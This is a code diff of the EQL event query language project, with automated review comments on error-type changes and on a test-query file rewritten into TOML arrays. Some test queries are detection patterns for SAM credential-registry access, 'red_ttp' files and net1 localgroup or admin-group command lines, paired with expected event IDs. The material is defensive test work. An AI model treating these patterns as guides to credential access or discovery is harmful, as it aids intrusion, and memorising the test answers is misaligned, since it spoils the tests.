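Review bot: `_convert_math_operation` has no docstring and silently depends on the functions named in `MathOperation.func_lookup` (`add`, `subtract`, `multiply`, `divide`, `modulo`) being registered; if one is missing the failure surfaces from `_convert_function_call` as `EqlCompileError("Unknown function divide")`, which is confusing for a user who wrote `a / b`. Add `"""Compile a math operator by rewriting it to the equivalent EQL function call (see MathOperation.func_lookup)."""` and consider reporting the operator rather than the synthesized function name in that case. Whether division by zero at runtime raises or yields null is decided by the `divide` callback, which is not visible here.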
@@ -765,7 +768,7 @@ def _convert_named_subquery(self, node): # type: (NamedSubquery) -> callable elif node.query_type == NamedSubquery.EVENT: return self._get_event_of(node.query) else: - raise ValueError("Unknown query type {}".format(node.query_type)) + raise EqlCompileError("Unknown query type {}".format(node.query_type)) def _get_descendant_of(self, node): # type: (EventQuery) -> callable sources = set() @@ -1093,7 +1096,7 @@ def callback(event): # type: (Event) -> None self._convert_sequence(base_query, output_pipe) else: - raise NotImplementedError("Unsupported {}".format(type(base_query).__name__)) + raise EqlCompileError("Unsupported {}".format(type(base_query).__name__)) def _convert_analytic(self, analytic): # type: (EqlAnalytic) -> callable analytic_id = analytic.id or analytic.name @@ -1181,7 +1184,7 @@ def reduce_events(self, inputs, analytic_id=None, finalize=True): elif isinstance(data, dict): events = [Event.from_data(data)] else: - raise ValueError("Unable to reduce {}".format(data)) + raise EqlCompileError("Unable to reduce {}".format(data)) for reducer in self._reducer_hooks[analytic_id]: reducer(events) diff --git a/eql/etc/test_data.json b/eql/etc/test_data.json index 90fab7e..4a08e7f 100644 --- a/eql/etc/test_data.json +++ b/eql/etc/test_data.json @@ -1261,7 +1261,7 @@ }, { "event_subtype_full": "request_event", - "event_type": "generic", + "event_type": "dns", "event_type_full": "dns_event", "opcode": 3008, "pid": 924, diff --git a/eql/etc/test_queries.toml b/eql/etc/test_queries.toml index 833528a..4682fba 100644 --- a/eql/etc/test_queries.toml +++ b/eql/etc/test_queries.toml 
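Review bot: In the `reduce_events` hunk a malformed input record (`data` neither a list nor a dict) now raises `EqlCompileError`, but this is runtime input validation rather than a compilation failure, so the exception type misclassifies the fault and callers catching compile errors around query compilation will not expect it from the reduce path. A `TypeError`/`ValueError` or a dedicated runtime error class would be more accurate; at minimum explain the choice with `# malformed input data at reduce time, not a query compile error`. The enclosing `reduce_events` starts outside the hunk.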
@@ -1,48 +1,48 @@ -[queries.q000] +[[queries]] query = 'process where serial_event_id = 1' expected_event_ids = [1] -[queries.q001] +[[queries]] query = 'process where serial_event_id < 4' expected_event_ids = [1, 2, 3] -[queries.q002] +[[queries]] query = 'process where true | head 6' expected_event_ids = [1, 2, 3, 4, 5, 6] -[queries.q003] +[[queries]] query = 'process where false' expected_event_ids = [] -[queries.q004] +[[queries]] expected_event_ids = [] query = 'process where missing_field != null' -[queries.q005] +[[queries]] expected_event_ids = [1, 2, 3, 4, 5] query = 'process where bad_field == null | head 5' -[queries.q006] +[[queries]] query = ''' process where process_name == "impossible name" or (serial_event_id < 4.5 and serial_event_id >= 3.1) ''' expected_event_ids = [4] -[queries.q007] +[[queries]] tags = ["comparisons", "pipes"] query = ''' process where serial_event_id <= 8 and serial_event_id > 7 | filter serial_event_id == 8''' expected_event_ids = [8] -[queries.q008] +[[queries]] query = ''' process where true | filter serial_event_id <= 10 | filter serial_event_id > 6''' expected_event_ids = [7, 8, 9, 10] -[queries.q009] +[[queries]] query = ''' process where true | filter serial_event_id <= 10 @@ -50,7 +50,7 @@ process where true | head 2''' expected_event_ids = [7, 8] -[queries.q010] +[[queries]] query = ''' process where true | head 1000 
@@ -60,43 +60,43 @@ process where true ''' expected_event_ids = [9, 10] -[queries.q011] +[[queries]] query = ''' process where serial_event_id<=8 and serial_event_id > 7 ''' expected_event_ids = [8] -[queries.q012] +[[queries]] note = "check that comparisons against null values return false" expected_event_ids = [58, 64, 69, 74, 80, 85, 90, 93, 94, 75303] query = 'process where exit_code >= 0' -[queries.q013] +[[queries]] note = "check that comparisons against null values return false" expected_event_ids = [58, 64, 69, 74, 80, 85, 90, 93, 94, 75303] query = 'process where 0 <= exit_code' -[queries.q014] +[[queries]] note = "check that comparisons against null values return false" expected_event_ids = [58, 64, 69, 74, 80, 85, 90, 93, 94, 75303] query = 'process where exit_code <= 0' -[queries.q015] +[[queries]] note = "check that comparisons against null values return false" expected_event_ids = [58, 64, 69, 74, 80, 85, 90, 93, 94, 75303] query = 'process where exit_code < 1' -[queries.q016] +[[queries]] note = "check that comparisons against null values return false" expected_event_ids = [58, 64, 69, 74, 80, 85, 90, 93, 94, 75303] query = 'process where exit_code > -1' -[queries.q017] +[[queries]] note = "check that comparisons against null values return false" expected_event_ids = [58, 64, 69, 74, 80, 85, 90, 93, 94, 75303] query = 'process where -1 < exit_code' -[queries.q018] +[[queries]] note = "check that comparisons against null values return false" expected_event_ids = [] query = ''' 
@@ -105,69 +105,69 @@ process where not (exit_code > -1) | head 10 ''' -[queries.q019] +[[queries]] note = "check that comparisons against null values return false" expected_event_ids = [1, 2, 3, 4, 5, 6, 7] query = 'process where not (exit_code > -1) | head 7' -[queries.q020] +[[queries]] note = "check that comparisons against null values return false" expected_event_ids = [1, 2, 3, 4, 5, 6, 7] query = 'process where not (-1 < exit_code) | head 7' -[queries.q021] +[[queries]] query = 'process where exit_code > 0' expected_event_ids = [] -[queries.q022] +[[queries]] query = 'process where exit_code < 0' expected_event_ids = [] -[queries.q023] +[[queries]] query = 'process where 0 < exit_code' expected_event_ids = [] -[queries.q024] +[[queries]] query = 'process where 0 > exit_code' expected_event_ids = [] -[queries.q025] +[[queries]] query = 'process where (serial_event_id<=8 and serial_event_id > 7) and (opcode=3 and opcode>2)' expected_event_ids = [8] -[queries.q026] +[[queries]] query = 'process where (serial_event_id<9 and serial_event_id >= 7) or (opcode == pid)' expected_event_ids = [7, 8] -[queries.q027] +[[queries]] query = 'process where process_name == "VMACTHLP.exe" and unique_pid == 12 | filter true' expected_event_ids = [12] -[queries.q028] +[[queries]] query = ''' process where process_name in ("python.exe", "SMSS.exe", "explorer.exe") | unique process_name''' expected_event_ids = [3, 34, 48] -[queries.q029] +[[queries]] query = ''' process where process_name in ("python.exe", "smss.exe", "Explorer.exe") | unique length(process_name)''' expected_event_ids = [3, 34, 48] -[queries.q030] +[[queries]] query = ''' process where process_name in ("python.exe", "smss.exe", "explorer.exe") | unique length(process_name) == length("python.exe")''' expected_event_ids = [3, 48] -[queries.q031] +[[queries]] query = ''' process where process_name in ("Python.exe", "smss.exe", "explorer.exe") | unique process_name != "python.exe"''' expected_event_ids = [3, 48] 
-[queries.q032] +[[queries]] query = ''' process where process_name in ("python.exe", "smss.exe", "explorer.exe") | unique process_name @@ -175,7 +175,7 @@ process where process_name in ("python.exe", "smss.exe", "explorer.exe") | tail 1''' expected_event_ids = [34] -[queries.q033] +[[queries]] query = ''' process where process_name in ("python.exe", "smss.exe", "explorer.exe") | unique process_name 
@@ -183,55 +183,55 @@ process where process_name in ("python.exe", "smss.exe", "explorer.exe") | head 1''' expected_event_ids = [34] -[queries.q034] +[[queries]] query = ''' process where process_name in ("python.exe", "smss.exe") | unique process_name parent_process_name''' expected_event_ids = [3, 48, 50, 54, 78] -[queries.q035] +[[queries]] query = ''' process where process_name in ("python.exe", "smss.exe") | unique process_name, parent_process_name''' expected_event_ids = [3, 48, 50, 54, 78] -[queries.q036] +[[queries]] query = ''' process where process_name in ("python.exe", "smss.exe") | head 5 | unique process_name parent_process_name''' expected_event_ids = [3, 48, 50, 54] -[queries.q037] +[[queries]] expected_event_ids = [57] query = ''' registry where length(bytes_written_string_list) == 2 and bytes_written_string_list[1] == "EN"''' -[queries.q038] +[[queries]] query = ''' registry where key_path == "*\\MACHINE\\SAM\\SAM\\*\\Account\\Us*ers\\00*03E9\\F"''' expected_event_ids = [79] -[queries.q039] +[[queries]] query = ''' process where process_path == "*\\red_ttp\\wininit.*" and opcode in (0,1,2,3,4)''' expected_event_ids = [84, 85] -[queries.q040] +[[queries]] query = ''' file where file_name == "csrss.exe" and opcode=0 and descendant of [process where opcode in (1,3) and process_name="cmd.exe"] ''' expected_event_ids = [72] -[queries.q041] +[[queries]] query = ''' process where opcode=1 and process_name == "csrss.exe" and descendant of [file where file_name == "csrss.exe" and opcode=0] ''' expected_event_ids = [73] -[queries.q042] +[[queries]] query = ''' process where opcode=1 and process_name == "smss.exe" and descendant of [ 
@@ -243,60 +243,75 @@ process where opcode=1 and process_name == "smss.exe" ''' expected_event_ids = [78] -[queries.q043] +[[queries]] query = ''' file where file_path="*\\red_ttp\\winin*.*" and opcode in (0,1,2) and user_name="vagrant" ''' expected_event_ids = [83, 86] -[queries.q044] +[[queries]] +query = ''' +file where file_path="*\\red_ttp\\winin*.*" + and opcode not in (0,1,2) and user_name="vagrant" +''' +expected_event_ids = [] + +[[queries]] +query = ''' +file where file_path="*\\red_ttp\\winin*.*" + and opcode not in (3, 4, 5, 6 ,7) and user_name="vagrant" +''' +expected_event_ids = [83, 86] + + +[[queries]] query = ''' file where file_name in ("wininit.exe", "lsass.exe") and opcode == 2 ''' expected_event_ids = [65, 86] -[queries.q045] +[[queries]] query = ''' file where true | tail 3''' expected_event_ids = [92, 95, 96] -[queries.q046] +[[queries]] query = ''' process where opcode in (1,3) and process_name in (parent_process_name, "SYSTEM") ''' expected_event_ids = [2, 50, 51] -[queries.q047] +[[queries]] expected_event_ids = [92, 95, 96, 91] query = ''' file where true | tail 4 | sort file_path''' -[queries.q048] +[[queries]] expected_event_ids = [2, 1, 4, 3, 5] query = ''' process where true | head 5 | sort md5 event_subtype_full process_name''' -[queries.q049] +[[queries]] expected_event_ids = [2, 1, 4, 3, 5] query = ''' process where true | head 5 | sort md5 event_subtype_full null_field process_name''' -[queries.q050] +[[queries]] expected_event_ids = [2, 1, 4, 3, 5] query = ''' process where true | head 5 | sort md5, event_subtype_full, null_field, process_name''' -[queries.q051] +[[queries]] expected_event_ids = [2, 1] query = ''' process where true @@ -304,7 +319,7 @@ process where true | sort md5 event_subtype_full null_field process_name | head 2''' -[queries.q052] +[[queries]] expected_event_ids = [1, 2, 3, 4, 5] query = ''' process where true 
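Review bot: The two new `not in` queries only exercise `opcode`, a field present on every matching event, so they leave the null case unpinned even though the earlier queries go out of their way to fix `<`/`>` behaviour against null (`check that comparisons against null values return false`) and `not (exit_code > -1)`. Add a case with a missing field, e.g. `file where missing_field not in (0, 1) | head 2`, with whichever `expected_event_ids` the existing `not (...)` semantics imply, so a later change to `Not`/`InSet` evaluation cannot silently alter it. Also `(3, 4, 5, 6 ,7)` has a stray space before the comma. The rest of the hunk is a mechanical rename of the table headers to `[[queries]]`.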
@@ -312,27 +327,56 @@ process where true | sort md5 event_subtype_full null_field process_name | sort serial_event_id''' -[queries.q053] +[[queries]] query = ''' -sequence [process where serial_event_id = 1] [process where serial_event_id = 2]''' +sequence + [process where serial_event_id = 1] + [process where serial_event_id = 2] +''' expected_event_ids = [1, 2] -[queries.q054] +[[queries]] query = ''' -sequence [process where serial_event_id < 5] [process where serial_event_id = 5]''' +sequence + [process where serial_event_id < 5] + [process where serial_event_id = 5] +''' expected_event_ids = [4, 5] -[queries.q055] +[[queries]] query = ''' -sequence [process where serial_event_id=1] by unique_pid [process where true] by unique_ppid''' +sequence + [process where serial_event_id=1] by unique_pid + [process where true] by unique_ppid''' expected_event_ids = [1, 2] -[queries.q056] +[[queries]] +query = ''' +sequence + [process where serial_event_id<3] by unique_pid + [process where true] by unique_ppid +''' +expected_event_ids = [1, 2, 2, 3] + +[[queries]] +query = ''' +sequence + [process where serial_event_id<3] by unique_pid * 2 + [process where true] by unique_ppid * 2 +''' +expected_event_ids = [1, 2, 2, 3] + + +[[queries]] query = ''' -sequence [process where serial_event_id<3] by unique_pid [process where true] by unique_ppid''' +sequence + [process where serial_event_id<3] by unique_pid * 2, length(unique_pid), string(unique_pid) + [process where true] by unique_ppid * 2, length(unique_ppid), string(unique_ppid) +''' expected_event_ids = [1, 2, 2, 3] -[queries.q057] + +[[queries]] query = ''' sequence [file where event_subtype_full == "file_create_event"] by file_path @@ -343,7 +387,7 @@ sequence | tail 2''' expected_event_ids = [67, 68, 69, 70, 72, 73, 74, 75] -[queries.q058] +[[queries]] query = ''' sequence with maxspan=1d [file where event_subtype_full == "file_create_event"] by file_path 
@@ -354,7 +398,7 @@ sequence with maxspan=1d | tail 2''' expected_event_ids = [67, 68, 69, 70, 72, 73, 74, 75] -[queries.q059] +[[queries]] query = ''' sequence with maxspan=1h [file where event_subtype_full == "file_create_event"] by file_path @@ -365,7 +409,7 @@ sequence with maxspan=1h | tail 2''' expected_event_ids = [67, 68, 69, 70, 72, 73, 74, 75] -[queries.q060] +[[queries]] query = ''' sequence with maxspan=1m [file where event_subtype_full == "file_create_event"] by file_path @@ -376,7 +420,7 @@ sequence with maxspan=1m | tail 2''' expected_event_ids = [67, 68, 69, 70, 72, 73, 74, 75] -[queries.q061] +[[queries]] query = ''' sequence with maxspan=10s [file where event_subtype_full == "file_create_event"] by file_path @@ -387,7 +431,7 @@ sequence with maxspan=10s | tail 2''' expected_event_ids = [67, 68, 69, 70, 72, 73, 74, 75] -[queries.q062] +[[queries]] query = ''' sequence with maxspan=0.5s [file where event_subtype_full == "file_create_event"] by file_path @@ -398,7 +442,7 @@ sequence with maxspan=0.5s | tail 2''' expected_event_ids = [] -[queries.q063] +[[queries]] query = ''' sequence [process where serial_event_id < 5] @@ -406,7 +450,7 @@ sequence ''' expected_event_ids = [1, 2, 2, 3, 3, 4] -[queries.q064] +[[queries]] query = ''' sequence [file where opcode=0 and file_name="svchost.exe"] by unique_pid @@ -414,7 +458,7 @@ sequence ''' expected_event_ids = [55, 56] -[queries.q065] +[[queries]] query = ''' sequence [file where opcode=0] by unique_pid @@ -422,7 +466,7 @@ sequence | head 1''' expected_event_ids = [55, 61] -[queries.q066] +[[queries]] query = ''' sequence [file where opcode=0] by unique_pid @@ -430,7 +474,7 @@ sequence | filter events[1].serial_event_id == 92''' expected_event_ids = [87, 92] -[queries.q067] +[[queries]] query = ''' sequence [file where opcode=0 and file_name="*.exe"] by unique_pid 
@@ -439,7 +483,7 @@ until [process where opcode=5000] by unique_ppid | head 1''' expected_event_ids = [55, 61] -[queries.q068] +[[queries]] query = ''' sequence [file where opcode=0 and file_name="*.exe"] by unique_pid @@ -448,7 +492,7 @@ until [process where opcode=1] by unique_ppid | head 1''' expected_event_ids = [] -[queries.q069] +[[queries]] query = ''' join [file where opcode=0 and file_name="*.exe"] by unique_pid @@ -457,14 +501,15 @@ until [process where opcode=1] by unique_ppid | head 1''' expected_event_ids = [61, 59] -[queries.q070] +[[queries]] query = ''' join by user_name [process where opcode in (1,3) and process_name="smss.exe"] - [process where opcode in (1,3) and process_name == "python.exe"]''' + [process where opcode in (1,3) and process_name == "python.exe"] +''' expected_event_ids = [78, 48] -[queries.q071] +[[queries]] query = ''' join by unique_pid [process where opcode=1] @@ -472,7 +517,15 @@ join by unique_pid [file where opcode == 0 and file_name == "lsass.exe"]''' expected_event_ids = [54, 55, 61] -[queries.q072] +[[queries]] +query = ''' +join by string(unique_pid) + [process where opcode=1] + [file where opcode=0 and file_name="svchost.exe"] + [file where opcode == 0 and file_name == "lsass.exe"]''' +expected_event_ids = [54, 55, 61] + +[[queries]] query = ''' join by unique_pid [process where opcode=1] 
@@ -481,28 +534,39 @@ join by unique_pid until [file where opcode == 2]''' expected_event_ids = [] -[queries.q073] +[[queries]] +query = ''' +join by string(unique_pid), unique_pid, unique_pid * 2 + [process where opcode=1] + [file where opcode=0 and file_name="svchost.exe"] + [file where opcode == 0 and file_name == "lsass.exe"] +until [file where opcode == 2]''' +expected_event_ids = [] + +[[queries]] query = ''' join [file where opcode=0 and file_name="svchost.exe"] by unique_pid - [process where opcode == 1] by unique_ppid''' + [process where opcode == 1] by unique_ppid +''' expected_event_ids = [55, 56] -[queries.q074] +[[queries]] query = ''' join by unique_pid [process where opcode in (1,3) and process_name="python.exe"] [file where file_name == "*.exe"]''' expected_event_ids = [54, 55] -[queries.q075] +[[queries]] query = ''' join by user_name [process where opcode in (1,3) and process_name="python.exe"] - [process where opcode in (1,3) and process_name == "smss.exe"]''' + [process where opcode in (1,3) and process_name == "smss.exe"] +''' expected_event_ids = [48, 78] -[queries.q076] +[[queries]] query = ''' join [process where opcode in (1,3) and process_name="python.exe"] @@ -510,34 +574,35 @@ join ''' expected_event_ids = [48, 3, 50, 78] -[queries.q077] +[[queries]] expected_event_ids = [] query = ''' process where fake_field == "*"''' -[queries.q078] +[[queries]] expected_event_ids = [1, 2, 3, 4] query = ''' process where fake_field != "*" | head 4''' -[queries.q079] +[[queries]] expected_event_ids = [1, 2, 3, 4] query = ''' process where not (fake_field == "*") | head 4''' -[queries.q080] +[[queries]] expected_event_ids = [] query = ''' registry where invalid_field_name != null''' -[queries.q081] +[[queries]] expected_event_ids = [] query = ''' -registry where length(bad_field) > 0''' +registry where length(bad_field) > 0 +''' -[queries.q082] +[[queries]] query = ''' process where opcode == 1 and process_name in ("net.exe", "net1.exe") 
@@ -546,44 +611,44 @@ process where opcode == 1 and command_line == "*group *admin*" and command_line != "* /add*"''' expected_event_ids = [97] -[queries.q083] +[[queries]] expected_event_ids = [1, 55, 57, 63, 75304] query = ''' any where true | unique event_type_full''' -[queries.q084] +[[queries]] query = ''' process where opcode=1 and process_name in ("services.exe", "smss.exe", "lsass.exe") and descendant of [process where process_name == "cmd.exe" ]''' expected_event_ids = [62, 68, 78] -[queries.q085] +[[queries]] query = ''' process where process_name in ("services.exe", "smss.exe", "lsass.exe") and descendant of [process where process_name == "cmd.exe" ]''' expected_event_ids = [62, 64, 68, 69, 78, 80] -[queries.q086] +[[queries]] query = ''' process where opcode=2 and process_name in ("services.exe", "smss.exe", "lsass.exe") and descendant of [process where process_name == "cmd.exe" ]''' expected_event_ids = [64, 69, 80] -[queries.q087] +[[queries]] query = ''' process where process_name="svchost.exe" and child of [file where file_name="svchost.exe" and opcode=0]''' expected_event_ids = [56, 58] -[queries.q088] +[[queries]] query = ''' process where process_name="svchost.exe" and not child of [file where file_name="svchost.exe" and opcode=0] | head 3''' expected_event_ids = [11, 13, 15] -[queries.q089] +[[queries]] query = ''' process where process_name="lsass.exe" and child of [ @@ -593,7 +658,7 @@ process where process_name="lsass.exe" ''' expected_event_ids = [62, 64] -[queries.q090] +[[queries]] query = ''' file where child of [ process where child of [ 
@@ -603,28 +668,28 @@ file where child of [ | tail 1''' expected_event_ids = [91] -[queries.q091] +[[queries]] query = ''' file where process_name = "python.exe" | unique unique_pid''' expected_event_ids = [55, 95] -[queries.q092] +[[queries]] query = ''' file where event of [process where process_name = "python.exe" ] | unique unique_pid''' expected_event_ids = [55, 95] -[queries.q093] +[[queries]] query = ''' process where process_name = "python.exe"''' expected_event_ids = [48, 50, 51, 54, 93] -[queries.q094] +[[queries]] query = 'process where event of [process where process_name = "python.exe" ]' expected_event_ids = [48, 50, 51, 54, 93] -[queries.q095] +[[queries]] query = ''' sequence [file where file_name="lsass.exe"] by file_path,process_path @@ -632,7 +697,7 @@ sequence ''' expected_event_ids = [61, 62] -[queries.q096] +[[queries]] query = ''' sequence by user_name [file where file_name="lsass.exe"] by file_path, process_path @@ -640,7 +705,7 @@ sequence by user_name ''' expected_event_ids = [61, 62] -[queries.q097] +[[queries]] query = ''' sequence by pid [file where file_name="lsass.exe"] by file_path,process_path @@ -648,7 +713,7 @@ sequence by pid ''' expected_event_ids = [] -[queries.q098] +[[queries]] query = ''' sequence by user_name [file where opcode=0] by file_path @@ -658,7 +723,7 @@ sequence by user_name | tail 1''' expected_event_ids = [88, 89, 90, 91] -[queries.q099] +[[queries]] query = ''' sequence by user_name [file where opcode=0] by pid,file_path @@ -667,7 +732,7 @@ until [process where opcode=2] by ppid,process_path ''' expected_event_ids = [] -[queries.q100] +[[queries]] query = ''' sequence by user_name [file where opcode=0] by pid,file_path @@ -676,7 +741,7 @@ until [process where opcode=5] by ppid,process_path | head 2''' expected_event_ids = [55, 59, 61, 65] -[queries.q101] +[[queries]] query = ''' sequence by pid [file where opcode=0] by file_path 
@@ -686,7 +751,7 @@ sequence by pid | tail 1''' expected_event_ids = [] -[queries.q102] +[[queries]] query = ''' join by user_name [file where true] by pid,file_path @@ -694,7 +759,7 @@ join by user_name | head 2''' expected_event_ids = [55, 56, 59, 58] -[queries.q103] +[[queries]] query = ''' sequence [process where true] by unique_pid @@ -703,42 +768,42 @@ sequence | head 4''' expected_event_ids = [54, 55, 56, 54, 61, 62, 54, 67, 68, 54, 72, 73] -[queries.q104] +[[queries]] query = ''' process where command_line == "*%*" ''' expected_event_ids = [4, 6, 28] -[queries.q105] +[[queries]] query = ''' process where command_line == "*%*%*" ''' expected_event_ids = [4, 6, 28] -[queries.q106] +[[queries]] query = ''' process where command_line == "%*%*" ''' expected_event_ids = [4, 6, 28] -[queries.q107] +[[queries]] expected_event_ids = [11, 60, 63] query = ''' any where process_name == "svchost.exe" | unique_count event_type_full process_name''' -[queries.q108] +[[queries]] expected_event_ids = [63, 60, 11] query = ''' any where process_name == "svchost.exe" | sort event_type_full serial_event_id | unique_count event_type_full process_name''' -[queries.q109] +[[queries]] expected_event_ids = [60] query = ''' any where process_name == "svchost.exe" | unique_count event_type_full opcode | filter count == 7''' -[queries.q110] +[[queries]] expected_event_ids = [11] query = ''' any where process_name == "svchost.exe" 
@@ -746,65 +811,65 @@ any where process_name == "svchost.exe" | filter percent >= .5 ''' -[queries.q111] +[[queries]] expected_event_ids = [57] query = ''' registry where arrayContains(bytes_written_string_list, 'En-uS')''' -[queries.q112] +[[queries]] expected_event_ids = [57] query = ''' registry where arrayContains(bytes_written_string_list, 'En')''' -[queries.q113] +[[queries]] expected_event_ids = [57] query = ''' registry where length(bytes_written_string_list) > 0 and bytes_written_string_list[0] == 'EN-us' ''' -[queries.q114] +[[queries]] expected_event_ids = [57] query = ''' registry where bytes_written_string_list[0] == 'EN-us' ''' -[queries.q115] +[[queries]] expected_event_ids = [57] query = ''' registry where bytes_written_string_list[1] == 'EN' ''' -[queries.q116] +[[queries]] query = ''' process where matchLite(?'.*?net1\s+localgroup\s+.*?', command_line) ''' expected_event_ids = [98] -[queries.q117] +[[queries]] query = ''' process where matchLite(?'.*?net1\s+\w+\s+.*?', command_line) ''' expected_event_ids = [98] -[queries.q118] +[[queries]] query = ''' process where matchLite(?'.*?net1\s+\w{4,15}\s+.*?', command_line) ''' expected_event_ids = [98] -[queries.q119] +[[queries]] expected_event_ids = [98] query = ''' process where match(?'.*?net1\s+\w{4,15}\s+.*?', command_line) ''' -[queries.q120] +[[queries]] query = ''' process where matchLite(?'.*?net1\s+[localgrup]{4,15}\s+.*?', command_line) ''' expected_event_ids = [98] -[queries.q121] +[[queries]] query = ''' process where 'net.EXE' == original_file_name | filter process_name="net*.exe" @@ -812,7 +877,7 @@ process where 'net.EXE' == original_file_name expected_event_ids = [97] note = "check that case insensitive comparisons are performed even for lhs strings." -[queries.q122] +[[queries]] query = ''' process where process_name == original_file_name | filter process_name='net*.exe' 
@@ -820,7 +885,7 @@ process where process_name == original_file_name expected_event_ids = [97, 98] note = "check that case insensitive comparisons are performed for fields." -[queries.q123] +[[queries]] query = ''' process where original_file_name == process_name | filter length(original_file_name) > 0 
@@ -828,210 +893,210 @@ process where original_file_name == process_name expected_event_ids = [97, 98, 75273, 75303] description = "check that case insensitive comparisons are performed for fields." -[queries.q124] +[[queries]] query = ''' file where opcode=0 and startsWith(file_name, 'exploRER.') ''' expected_event_ids = [88, 92] description = "check built-in string functions" -[queries.q125] +[[queries]] query = ''' file where opcode=0 and startsWith(file_name, 'expLORER.exe') ''' expected_event_ids = [88, 92] description = "check built-in string functions" -[queries.q126] +[[queries]] query = ''' file where opcode=0 and endsWith(file_name, 'loREr.exe')''' expected_event_ids = [88] description = "check built-in string functions" -[queries.q127] +[[queries]] query = ''' file where opcode=0 and startsWith(file_name, 'explORER.EXE')''' expected_event_ids = [88, 92] description = "check built-in string functions" -[queries.q128] +[[queries]] query = ''' file where opcode=0 and startsWith('explorer.exeaaaaaaaa', file_name)''' expected_event_ids = [88] description = "check built-in string functions" -[queries.q129] +[[queries]] query = ''' file where opcode=0 and serial_event_id = 88 and startsWith('explorer.exeaAAAA', 'EXPLORER.exe')''' expected_event_ids = [88] description = "check built-in string functions" -[queries.q130] +[[queries]] query = ''' file where opcode=0 and stringContains('ABCDEFGHIexplorer.exeJKLMNOP', file_name) ''' expected_event_ids = [88] description = "check built-in string functions" -[queries.q131] +[[queries]] query = ''' file where opcode=0 and indexOf(file_name, 'plore') == 2 and not indexOf(file_name, '.pf') ''' expected_event_ids = [88] description = "check built-in string functions" -[queries.q132] +[[queries]] query = ''' file where opcode=0 and indexOf(file_name, 'explorer.') and indexOf(file_name, 'plore', 100) ''' expected_event_ids = [] description = "check built-in string functions" -[queries.q133] +[[queries]] query = ''' file 
where opcode=0 and indexOf(file_name, 'plorer.', 0) == 2''' expected_event_ids = [88, 92] description = "check built-in string functions" -[queries.q134] +[[queries]] query = ''' file where opcode=0 and indexOf(file_name, 'plorer.', 2)''' expected_event_ids = [88, 92] description = "check built-in string functions" -[queries.q135] +[[queries]] query = ''' file where opcode=0 and indexOf(file_name, 'plorer.', 4)''' expected_event_ids = [] description = "check built-in string functions" -[queries.q136] +[[queries]] query = ''' file where opcode=0 and indexOf(file_name, 'thing that never happened')''' expected_event_ids = [] description = "check built-in string functions" -[queries.q137] +[[queries]] query = ''' file where opcode=0 and indexOf(file_name, 'plorer.', 2) == 2''' expected_event_ids = [88, 92] description = "check substring ranges" -[queries.q138] +[[queries]] query = ''' file where opcode=0 and indexOf(file_name, 'explorer.', 0) == 0''' expected_event_ids = [88, 92] description = "check substring ranges" -[queries.q139] +[[queries]] query = ''' file where serial_event_id=88 and substring(file_name, 0, 4) == 'expl' ''' expected_event_ids = [88] description = "check substring ranges" -[queries.q140] +[[queries]] query = ''' file where serial_event_id=88 and substring(file_name, 1, 3) == 'xp' ''' expected_event_ids = [88] description = "chaeck substring ranges" -[queries.q141] +[[queries]] query = ''' file where serial_event_id=88 and substring(file_name, -4) == '.exe' ''' expected_event_ids = [88] description = "check substring ranges" -[queries.q142] +[[queries]] query = ''' file where serial_event_id=88 and substring(file_name, -4, -1) == '.ex' ''' expected_event_ids = [88] description = "check substring ranges" -[queries.q143] +[[queries]] query = ''' process where add(serial_event_id, 0) == 1 and add(0, 1) == serial_event_id''' expected_event_ids = [1] description = "test built-in math functions" -[queries.q144] +[[queries]] query = ''' process where 
subtract(serial_event_id, -5) == 6''' expected_event_ids = [1] description = "test built-in math functions" -[queries.q145] +[[queries]] query = ''' process where multiply(6, serial_event_id) == 30 and divide(30, 4.0) == 7.5''' expected_event_ids = [5] description = "test built-in math functions" -[queries.q146] +[[queries]] query = ''' process where modulo(11, add(serial_event_id, 1)) == serial_event_id''' expected_event_ids = [1, 2, 3, 5, 11] description = "test built-in math functions" -[queries.q147] +[[queries]] query = ''' process where serial_event_id == number('5')''' expected_event_ids = [5] description = "test string/number conversions" -[queries.q148] +[[queries]] expected_event_ids = [50] description = "test string/number conversions" query = ''' process where serial_event_id == number('0x32', 16)''' -[queries.q149] +[[queries]] expected_event_ids = [50] description = "test string/number conversions" query = ''' process where serial_event_id == number('32', 16)''' -[queries.q150] +[[queries]] query = ''' process where number(serial_event_id) == number(5)''' expected_event_ids = [5] description = "test string/number conversions" -[queries.q151] +[[queries]] query = ''' process where concat(serial_event_id, ':', process_name, opcode) == '5:winINIT.exe3' ''' expected_event_ids = [5] description = "test string concatenation" -[queries.q152] +[[queries]] query = ''' process where process_name != original_file_name | filter length(original_file_name) > 0''' expected_event_ids = [] description = "check that case insensitive comparisons are performed for fields." 
-[queries.q153] +[[queries]] query = ''' sequence by unique_pid [process where opcode=1 and process_name == 'msbuild.exe'] [network where true]''' expected_event_ids = [75273, 75304] description = "test that process sequences are working correctly" -[queries.q154] +[[queries]] expected_event_ids = [57] description = "test arraySearch functionality for lists of strings, and lists of objects" query = ''' registry where arraySearch(bytes_written_string_list, a, a == 'en-us')''' -[queries.q155] +[[queries]] expected_event_ids = [57] description = "test arraySearch functionality for lists of strings, and lists of objects" query = ''' registry where arraySearch(bytes_written_string_list, a, endsWith(a, '-us'))''' -[queries.q156] +[[queries]] expected_event_ids = [75305] description = "test arraySearch - true" query = ''' @@ -1039,28 +1104,28 @@ network where mysterious_field and arraySearch(mysterious_field.subarray, s, true) ''' -[queries.q157] +[[queries]] expected_event_ids = [] description = "test arraySearch - false" query = ''' network where mysterious_field and arraySearch(mysterious_field.subarray, s, false) ''' -[queries.q158] +[[queries]] expected_event_ids = [75305] description = "test arraySearch - conditional" query = ''' network where mysterious_field and arraySearch(mysterious_field.subarray, s, s.a == 's0-*') ''' -[queries.q159] +[[queries]] expected_event_ids = [75305] description = "test arraySearch - conditional" query = ''' network where mysterious_field and arraySearch(mysterious_field.subarray, s, s.a != 's0-*') ''' -[queries.q160] +[[queries]] expected_event_ids = [75305] description = "test arraySearch - nested" query = ''' @@ -1069,7 +1134,7 @@ network where mysterious_field arraySearch(sub1.c, nested, nested.x.y == '*')) ''' -[queries.q161] +[[queries]] expected_event_ids = [75305] description = "test arraySearch - nested with cross-check pass" query = ''' 
@@ -1078,7 +1143,7 @@ network where mysterious_field sub1.a == 's0-a' and arraySearch(sub1.c, nested, nested.z == 's0-c1-x-z')) ''' -[queries.q162] +[[queries]] expected_event_ids = [75305] description = "test arraySearch - nested with cross-check pass" query = ''' @@ -1087,7 +1152,7 @@ network where mysterious_field sub1.a == 's0-a' and arraySearch(sub1.c, nested, nested.z == sub1.cross_match)) ''' -[queries.q163] +[[queries]] expected_event_ids = [75305] description = "test arraySearch - nested with cross-check pass" query = ''' 
